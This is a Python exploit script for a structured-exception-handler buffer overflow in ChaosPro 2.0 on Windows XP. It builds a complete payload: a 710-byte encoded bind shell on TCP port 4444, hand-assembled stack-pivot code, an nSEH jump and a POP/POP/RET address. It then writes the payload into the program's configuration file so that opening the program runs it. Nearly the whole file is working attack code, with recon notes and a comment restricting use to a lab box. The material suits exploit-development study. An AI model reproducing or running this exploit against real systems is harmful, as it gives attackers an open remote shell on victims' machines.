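#!/usr/bin/env python2
# Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)
# Date: 2019-10-27
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://www.chaospro.de/
# Software link: http://www.chaospro.de/cpro20.zip
# Version: 2.0
# Tested on: Windows XP Pro OEM
#
# Layout of the PicturePath value this script writes into ChaosPro.cfg
# (byte offsets, derived from the pattern_offset results noted below):
#
#   [   0, 2575)  "second stage": 16 pad bytes, the 710-byte alpha_mixed
#                 bind shell (BufferRegister=ESP), then INC ECX ("A") filler
#   [2575, 2701)  "first stage": 69 bytes of hand-written x86 that writes a
#                 JMP ESP into the filler ahead of EIP and points ESP at the
#                 decoder, padded with "A" to 126 bytes
#   [2701, 2705)  nSEH: JMP SHORT -0x80 (EB 80), back to offset 2575
#   [2705, 2709)  SEH: 0x00401B44, POP EDI / POP ESI / RETN
#
# Every piece is a bytes object and the config is written in binary mode so
# the file is byte-exact under both Python 2 and Python 3.  With a text-mode
# write under Python 3 the 0xEB/0x80 of the nSEH jump would be re-encoded
# (or rejected) according to the locale encoding and the chain would break.
# The stack addresses in the comments are from the author's XP box and will
# differ on another system or build; the offsets are what matters.
import os
import sys

# ---- recon notes (kept from the original) ---------------------------------
# "A" * 5000 -> 41414141 in SEH, reachable via ProfilePath or PicturePath.
# pattern_create 5000 / pattern_offset 326d4431 -> SEH handler at 2705,
# so nSEH is at 2701 and the 126-byte first-stage window starts at 2575.
# pattern_create 2575 / dump at 0012F51C reads 61354161 (61413561 LE) ->
# pattern_offset 16: the buffer starts 16 bytes before 0012F51C, so that is
# where the decoder is placed and where ESP has to point.

SEH_OFFSET = 2705
NSEH_OFFSET = SEH_OFFSET - 4                       # 2701
FIRST_STAGE_LEN = 126
SECOND_STAGE_LEN = NSEH_OFFSET - FIRST_STAGE_LEN   # 2575
DECODER_OFFSET = 16

# Where the config is written; run the script from the directory just
# outside ChaosPro's install directory (path kept exactly as the original).
# NOTE: this overwrites whatever ChaosPro.cfg is already there.
CFG_PATH = "chaospro\\ChaosPro.cfg"

# ---- second stage ---------------------------------------------------------
# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh \
#   BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c
# 710 bytes.  This is an unauthenticated bind shell on TCP/4444: anyone who
# can reach the port gets the shell, so only use it on an isolated lab box.
SHELLCODE = (
    b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
    b"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
    b"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70"
    b"\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50"
    b"\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b"
    b"\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50"
    b"\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c"
    b"\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b"
    b"\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30"
    b"\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b"
    b"\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70"
    b"\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63"
    b"\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f"
    b"\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b"
    b"\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d"
    b"\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77"
    b"\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78"
    b"\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a"
    b"\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31"
    b"\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52"
    b"\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63"
    b"\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43"
    b"\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f"
    b"\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f"
    b"\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30"
    b"\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49"
    b"\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f"
    b"\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73"
    b"\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76"
    b"\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a"
    b"\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f"
    b"\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b"
    b"\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d"
    b"\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47"
    b"\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56"
    b"\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58"
    b"\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44"
    b"\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42"
    b"\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56"
    b"\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69"
    b"\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f"
    b"\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a"
    b"\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46"
    b"\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31"
    b"\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b"
    b"\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69"
    b"\x6f\x39\x45\x41\x41"
)  # 710 bytes

# ---- first stage ----------------------------------------------------------
# At entry ESP is 0012E75C; the author moves it to 0012FF98 (delta 0x183C,
# 4- and 16-byte aligned per the bc checks in the original).
#   54          PUSH ESP
#   58          POP EAX
#   66:05 3C18  ADD AX,183C
#   50          PUSH EAX
#   5C          POP ESP
MOVE_ESP = b"\x54\x58\x66\x05\x3c\x18\x50\x5c"  # 8 bytes

# Build 0x4141E4FF in EAX without NUL bytes and push it.  Little-endian on
# the stack that is FF E4 41 41 = JMP ESP / INC ECX / INC ECX, dropped into
# the "A" sled ahead of EIP so execution slides into it.  The two ANDs zero
# EAX (0x28282828 & 0x47474747 == 0), the three SUBs yield the constant.
# Generated with: ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803
PUSH_JMP_ESP = (
    b"\x25\x28\x28\x28\x28"  # AND EAX,0x28282828
    b"\x25\x47\x47\x47\x47"  # AND EAX,0x47474747
    b"\x2d\x7f\x01\x7f\x7f"  # SUB EAX,0x7f7f017f
    b"\x2d\x7f\x01\x01\x01"  # SUB EAX,0x0101017f
    b"\x2d\x03\x18\x3e\x3e"  # SUB EAX,0x3e3e1803
    b"\x50"                  # PUSH EAX
)  # 26 bytes

# Step ESP past the JMP ESP just pushed so the next push/pop lands beyond
# it and does not clobber it ("keep the sled clean").
INC_ESP_X8 = b"\x44" * 8  # 8 bytes

# Same trick for 0x0012F51C, the address of the decoder
# (0x02020202 & 0x51515151 == 0, then three SUBs).
# Generated with: ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864
PUSH_DECODER_ADDR = (
    b"\x25\x02\x02\x02\x02"  # AND EAX,0x02020202
    b"\x25\x51\x51\x51\x51"  # AND EAX,0x51515151
    b"\x2d\x7f\x01\x7f\x7f"  # SUB EAX,0x7f7f017f
    b"\x2d\x01\x01\x01\x61"  # SUB EAX,0x61010101
    b"\x2d\x64\x08\x6d\x1f"  # SUB EAX,0x1f6d0864
    b"\x50"                  # PUSH EAX
)  # 26 bytes

# POP ESP -> ESP = 0x0012F51C.  alpha_mixed was generated with
# BufferRegister=ESP, i.e. it expects ESP to point at its own first byte
# when the JMP ESP fires.
POP_ESP = b"\x5c"  # 1 byte

# nSEH: EB 80 = JMP SHORT -0x80 (from 2703 back to 2575), plus two INC ECX
# of padding to fill the 4-byte slot.
NSEH = b"\xeb\x80" + b"\x41\x41"

# SEH: 00401B44  5F POP EDI / 5E POP ESI / C3 RETN  (stored little-endian).
# Presumably inside the ChaosPro image itself -- not shown in these notes.
SEH = b"\x44\x1b\x40\x00"


def build_sploit():
    """Assemble the PicturePath value.

    Returns the full payload as bytes, SEH_OFFSET + 4 == 2709 bytes long.
    Raises ValueError if a fixed-size region does not add up, which would
    otherwise silently shift nSEH/SEH off the offsets found by recon.
    """
    second_stage = b"A" * DECODER_OFFSET + SHELLCODE
    second_stage += b"A" * (SECOND_STAGE_LEN - len(second_stage))
    if len(second_stage) != SECOND_STAGE_LEN:
        raise ValueError("second stage is %d bytes, expected %d"
                         % (len(second_stage), SECOND_STAGE_LEN))

    first_stage = (MOVE_ESP + PUSH_JMP_ESP + INC_ESP_X8
                   + PUSH_DECODER_ADDR + POP_ESP)
    first_stage += b"A" * (FIRST_STAGE_LEN - len(first_stage))
    if len(first_stage) != FIRST_STAGE_LEN:
        raise ValueError("first stage is %d bytes, expected %d"
                         % (len(first_stage), FIRST_STAGE_LEN))

    payload = second_stage + first_stage + NSEH + SEH
    if len(payload) != SEH_OFFSET + 4:
        raise ValueError("payload is %d bytes, expected %d"
                         % (len(payload), SEH_OFFSET + 4))
    return payload


sploit = build_sploit()


def ret_cfg(inp, path=CFG_PATH):
    """Write ``PicturePath <inp>`` to ChaosPro's config ("do it live").

    ``inp`` is the payload; a text string is encoded Latin-1 so every
    character maps to exactly one byte.  The file is opened in binary mode
    so no newline or encoding translation touches the payload.  Overwrites
    ``path`` (default: chaospro\\ChaosPro.cfg relative to the cwd).
    Returns the bytes written.
    """
    if not isinstance(inp, bytes):
        inp = inp.encode("latin-1")
    cfg = b"PicturePath " + inp
    with open(path, "wb") as cfg_file:
        cfg_file.write(cfg)
    return cfg


if __name__ == "__main__":
    ret_cfg(sploit)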